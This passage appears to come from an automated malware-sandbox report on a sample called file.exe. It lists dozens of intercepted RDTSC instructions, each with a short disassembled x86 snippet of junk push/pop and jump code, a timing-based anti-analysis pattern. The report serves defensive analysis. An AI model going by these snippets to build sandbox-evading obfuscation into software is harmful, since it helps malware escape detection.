Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007179 second address: 10071A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6235h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE622Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10072D1 second address: 10072EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4B9132D6A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007496 second address: 100749E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100749E second address: 10074A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D34C second address: 100D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 ja 00007F4B90BE6226h 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D359 second address: 100D372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D6A3h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D372 second address: 100D37F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80659 second address: F8067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F4B9132D6ACh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4B9132D6A4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BE95 second address: 100BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BE9B second address: 100BEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BEA0 second address: 100BEBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BEBE second address: 100BEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BFE3 second address: 100BFEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C3E7 second address: 100C3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C3F4 second address: 100C407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C407 second address: 100C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jbe 00007F4B9132D6AFh 0x0000001a jmp 00007F4B9132D6A7h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C445 second address: 100C44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C44B second address: 100C466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA02 second address: 100CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA06 second address: 100CA1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F4B9132D696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F4B9132D6B4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA1D second address: 100CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6238h 0x00000009 pushad 0x0000000a jmp 00007F4B90BE622Fh 0x0000000f jno 00007F4B90BE6226h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA50 second address: 100CA58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA58 second address: 100CA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6232h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA6E second address: 100CA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F4B9132D696h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CBB9 second address: 100CBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4B90BE6226h 0x0000000a push ebx 0x0000000b jmp 00007F4B90BE622Bh 0x00000010 jmp 00007F4B90BE622Fh 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4B90BE6235h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101062E second address: 1010639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4B9132D696h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1010639 second address: 101063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101346E second address: 1013496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4B9132D69Ah 0x0000000e jmp 00007F4B9132D6A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013496 second address: 101349C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101349C second address: 10134A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012D8B second address: 1012D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4B90BE6226h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013045 second address: 101304F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101304F second address: 1013055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013055 second address: 1013059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101319A second address: 10131AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE622Dh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10131AF second address: 10131B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10131B4 second address: 10131BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10159A3 second address: 10159A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10170B3 second address: 10170D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10170D2 second address: 10170D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A212 second address: 101A21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4B90BE622Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019BA3 second address: 1019BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4B9132D6A9h 0x0000000b pushad 0x0000000c jne 00007F4B9132D696h 0x00000012 jmp 00007F4B9132D6A7h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EB4 second address: 1019EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 jbe 00007F4B90BE623Bh 0x0000000d jmp 00007F4B90BE622Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EE6 second address: 1019EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EF1 second address: 1019EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EF7 second address: 1019F01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E73D second address: 101E755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4B90BE622Ch 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E755 second address: 101E778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4B9132D696h 0x0000000a jmp 00007F4B9132D6A6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E778 second address: 101E782 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6232h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E782 second address: 101E788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EA0F second address: 101EA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EA15 second address: 101EA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007F4B9132D6A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EA3A second address: 101EA4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4B90BE6226h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBCA second address: 101EBCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBCF second address: 101EBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBD5 second address: 101EBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBDB second address: 101EBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F4B90BE6226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1023230 second address: 1023234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10239A8 second address: 10239B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10239B0 second address: 10239B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1023AFD second address: 1023B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6234h 0x00000007 jnl 00007F4B90BE6226h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F4B90BE6235h 0x00000018 jmp 00007F4B90BE622Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102AB0D second address: 102AB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B055 second address: 102B06A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B06A second address: 102B06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102BF77 second address: 102BF84 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102BF84 second address: 102BFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A8h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030D24 second address: 1030D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030D28 second address: 1030D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D6A9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DD4 second address: 1035DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DD8 second address: 1035DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DDE second address: 1035DE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DE5 second address: 1035DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DEE second address: 1035DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035454 second address: 1035462 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F4B9132D696h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10355D2 second address: 10355E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE622Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10355E0 second address: 10355E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035752 second address: 1035758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035758 second address: 103575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103575C second address: 1035760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359A1 second address: 10359B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359B4 second address: 10359B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359B8 second address: 10359CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359CF second address: 10359D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103BA47 second address: 103BA64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F4B9132D696h 0x00000009 jmp 00007F4B9132D69Bh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F4B9132D696h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103BE59 second address: 103BE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103BFE2 second address: 103BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103C173 second address: 103C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B2BE second address: 103B2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B2C2 second address: 103B2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10410DF second address: 10410E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10410E6 second address: 10410EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10410EB second address: 10410F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104260A second address: 104261A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104261A second address: 1042626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D0A2 second address: F7D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104A9CE second address: 104A9D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4B9132D696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104A9D8 second address: 104A9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B90BE622Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104A9EF second address: 104A9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055578 second address: 1055582 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B90BE6226h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055582 second address: 10555AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B9132D6A3h 0x00000010 jmp 00007F4B9132D69Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10555AA second address: 10555CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4B90BE6236h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10555CC second address: 10555D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B9132D69Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1054F80 second address: 1054F94 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F4B90BE6226h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
